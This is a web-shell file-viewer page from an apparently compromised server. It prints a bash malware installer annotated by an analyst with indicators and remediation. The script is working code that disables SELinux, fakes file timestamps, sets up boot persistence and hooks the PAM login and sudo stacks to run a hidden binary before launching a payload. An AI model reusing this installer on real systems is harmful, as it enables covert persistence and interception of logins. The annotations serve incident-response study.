MOON
Server: Apache
System: Linux vmi433716.contaboserver.net 3.10.0-1160.144.1.el7.tuxcare.els4.x86_64 #1 SMP Tue Apr 7 08:40:40 UTC 2026 x86_64
User: affpashacom (1022)
PHP: 8.0.30
Disabled: NONE
File: //var/tmp/.eres/hash/start
#!/bin/bash
# Analyst annotation: this appears to be an installer left on a compromised
# host (the page shows it under /var/tmp/.eres/hash/). Every step below
# changes system-wide state and in practice needs root. The comments describe
# the observable effect of each step and what a responder can check.
#
# Pin PATH to the standard system directories so the commands below resolve
# the same way regardless of the caller's environment.
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# Reserve 2500 static huge pages immediately (about 4.9 GiB at the common
# 2 MiB x86_64 huge page size) and persist the value in /etc/sysctl.conf
# unless that file already mentions vm.nr_hugepages.
# NOTE(review): a large static huge page reservation together with the
# "performance" CPU governor set later in this file is a tuning pattern
# commonly seen with CPU cryptominers; the payload is not visible on this
# page, so treat that as a lead to confirm, not a finding.
# Check: `sysctl vm.nr_hugepages`, HugePages_Total in /proc/meminfo, and an
# unexpected vm.nr_hugepages line in /etc/sysctl.conf. The append is
# conditional, so a missing line does not prove the script never ran.
sysctl -w vm.nr_hugepages=2500
grep -q 'vm.nr_hugepages' /etc/sysctl.conf || echo 'vm.nr_hugepages=2500' >> /etc/sysctl.conf

# Turn off transparent huge pages (both the "enabled" and "defrag" knobs) for
# the running kernel. This is runtime-only; the rc.local file written further
# down re-applies it at boot.
echo never > /sys/kernel/mm/transparent_hugepage/enabled 2>/dev/null
echo never > /sys/kernel/mm/transparent_hugepage/defrag 2>/dev/null

# Boot persistence for the tuning only: if /etc/rc.local does not exist yet,
# create it with the content of the here-document and mark it executable.
# The delimiter is quoted ('EOF'), so the text is written literally, with no
# variable or command expansion. An existing rc.local is left untouched.
# Note that the generated file re-applies the THP and CPU governor settings;
# it does not launch fd-monitor or the payload.
# Check: an /etc/rc.local with exactly this content, created around the time
# of the intrusion, on a host that previously had none.
if [ ! -f /etc/rc.local ]; then
cat <<'EOF' > /etc/rc.local
#!/bin/bash
echo never > /sys/kernel/mm/transparent_hugepage/enabled
echo never > /sys/kernel/mm/transparent_hugepage/defrag
for c in /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor; do
  echo performance > "$c" 2>/dev/null
done
exit 0
EOF
chmod +x /etc/rc.local
fi

# Set the cpufreq scaling governor of every CPU that exposes one to
# "performance" for the running system.
# Check: `cat /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor` on a host
# whose baseline uses a different governor.
for c in /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor; do
  echo performance > "$c" 2>/dev/null
done

# Enable the systemd unit that runs /etc/rc.local at boot. All output is
# discarded, so a failure here is silent.
# Check: `systemctl is-enabled rc-local.service` against the host baseline.
systemctl enable rc-local.service >/dev/null 2>&1

# Raise the open-file limit to 65535 for this shell and its children, and
# append system-wide soft/hard nofile limits for all users ("*") to
# /etc/security/limits.conf unless the string "nofile" already occurs
# anywhere in that file.
# Check: trailing "* soft nofile 65535" / "* hard nofile 65535" lines. The
# append is conditional, so their absence is not evidence of a clean host.
ulimit -n 65535
grep -q 'nofile' /etc/security/limits.conf || {
  echo '* soft nofile 65535' >> /etc/security/limits.conf
  echo '* hard nofile 65535' >> /etc/security/limits.conf
}

# Runtime-only TCP tuning (not written to sysctl.conf): shorten the FIN-WAIT-2
# timeout to 15 seconds and allow reuse of TIME-WAIT sockets for new outbound
# connections.
# NOTE(review): presumably intended for a process that opens many
# connections; confirm against the payload's actual network behaviour.
sysctl -w net.ipv4.tcp_fin_timeout=15
sysctl -w net.ipv4.tcp_tw_reuse=1

# Defence weakening: where the SELinux tools are installed, switch the running
# system to permissive mode and rewrite the SELINUX= line in
# /etc/selinux/config so that permissive mode persists across reboots.
# Check: `getenforce` returning Permissive on a host that should be Enforcing,
# an unexpected modification of /etc/selinux/config, and MAC_STATUS records in
# the audit log around the time of the change.
# Remediation must restore the intended mode both in the config file and at
# runtime (the host baseline decides which mode that is).
if command -v setenforce &>/dev/null; then
    setenforce 0
    sed -i 's/^SELINUX=.*/SELINUX=permissive/' /etc/selinux/config
fi

# Unpack loc-akamai.tgz from the current working directory, then move the
# archive to /etc and a file named fd-monitor to /usr/bin.
# NOTE(review): fd-monitor and the akamai/ directory used at the end of this
# script presumably come from this archive; their contents are not visible
# here.
tar xvfz loc-akamai.tgz
mv loc-akamai.tgz /etc
mv fd-monitor /usr/bin
# Timestamp tampering: copy the access and modification times of /bin/bash
# onto both dropped files so they appear to date from the OS install.
# touch cannot set the inode change time, so ctime (`stat`) still reflects
# when the files were really placed. A ctime much newer than mtime on
# /usr/bin/fd-monitor or /etc/loc-akamai.tgz is a usable indicator.
# Package ownership queries (`rpm -qf`, `dpkg -S`) should report both paths as
# not owned by any package.
touch -r /bin/bash /usr/bin/fd-monitor /etc/loc-akamai.tgz
chmod +x /usr/bin/fd-monitor
# Reset the SELinux label of the binary to the policy default for its path.
# Errors are discarded and the `|| true` keeps the script going on hosts
# without SELinux.
restorecon -v /usr/bin/fd-monitor 2>/dev/null || true
echo "[+] Installed script at: /usr/bin/fd-monitor"

# PAM stack files to modify: system-auth is the shared stack on RHEL-family
# systems and common-auth is a shared file on Debian-family systems.
pamfiles="/etc/pam.d/system-auth /etc/pam.d/common-auth"
# The line to be appended. pam_exec.so runs an external command from the PAM
# stack: as a "session" entry it is invoked when a session is opened and
# closed, with PAM_USER, PAM_RHOST, PAM_SERVICE, PAM_TTY and PAM_TYPE in its
# environment. "optional" means its result does not affect the login outcome,
# and "quiet" suppresses the message pam_exec would otherwise print when the
# command exits with a failure status.
# Check: `grep -r pam_exec /etc/pam.d` and compare with the host baseline.
# This exact string is a strong indicator of this installer.
HOOK="session optional pam_exec.so quiet /usr/bin/fd-monitor"

# Detect RHEL-based systems (CentOS, Alma, Rocky, RHEL) via
# /etc/redhat-release or a case-insensitive match in /etc/os-release. The flag
# is only consulted by the /etc/pam.d/sudo step further down.
if [ -f /etc/redhat-release ] || grep -qiE 'centos|alma|rocky|rhel' /etc/os-release 2>/dev/null; then
    IS_RHEL_FAMILY=true
else
    IS_RHEL_FAMILY=false
fi

echo "[*] Installing PAM hooks..."

# --- Add hook to core PAM files ---
# Authentication-stack persistence: for each file listed in $pamfiles that
# exists, append the $HOOK line unless that exact string is already present
# (fixed-string grep), so re-running the installer does not duplicate it.
# Once appended, services whose session stack pulls in the modified file run
# /usr/bin/fd-monitor with the privileges of the calling service.
# NOTE(review): what fd-monitor does is not visible on this page; treat the
# host's logins as observed by attacker-controlled code until it is analysed.
# Remediation: remove the appended line from each file, verify the rest of
# /etc/pam.d against known-good copies, and keep a working root session open
# while editing PAM so a mistake cannot lock administrators out.
for pamfile in $pamfiles; do
    if [ -f "$pamfile" ]; then
        if grep -qF -- "$HOOK" "$pamfile"; then
            echo "[=] Already hooked: $pamfile"
        else
            echo "$HOOK" >> "$pamfile"
            echo "[+] Hooked PAM file: $pamfile"
        fi
    else
        echo "[-] PAM file not found: $pamfile (skipped)"
    fi
done

# --- Fix sudo behavior on CentOS/RHEL family ---
# Analyst note: the "fix" extends the hook's reach. On RHEL-family hosts with
# an /etc/pam.d/sudo file, a "session include system-auth" line is appended
# unless a matching line already exists, so sudo sessions also traverse the
# system-auth session stack that carries the pam_exec hook.
# Check: a trailing "session    include      system-auth" line in
# /etc/pam.d/sudo that is not in the packaged version of the file.
if [ "$IS_RHEL_FAMILY" = true ] && [ -f /etc/pam.d/sudo ]; then
    if ! grep -q 'session.*include.*system-auth' /etc/pam.d/sudo; then
        echo "[+] Adding missing 'session include system-auth' to /etc/pam.d/sudo"
        echo "session    include      system-auth" >> /etc/pam.d/sudo
    else
        echo "[=] /etc/pam.d/sudo already includes system-auth session stack"
    fi
fi

echo "[*] Starting payload..."

# Change into the akamai/ directory relative to the current working directory
# and run the executable named "go" there. If either step fails, the script
# prints an error and exits with status 1.
# NOTE(review): akamai/ is presumably created by the tar extraction earlier in
# this script. The executable is not shown on this page and should be
# preserved for analysis along with /etc/loc-akamai.tgz and
# /usr/bin/fd-monitor. All system changes above have already been applied by
# this point, whether or not the payload starts.
cd akamai && ./go || { echo "[-] Payload execution failed"; exit 1; }